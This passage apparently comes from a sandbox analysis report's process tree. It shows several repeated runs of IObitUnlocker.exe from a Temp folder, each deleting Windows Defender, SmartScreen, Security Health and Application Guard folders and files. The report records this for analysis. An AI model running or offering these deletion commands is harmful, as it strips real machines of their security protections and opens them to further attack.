Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10748
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2016
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10504
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11088
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:10400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:10740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:11128
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
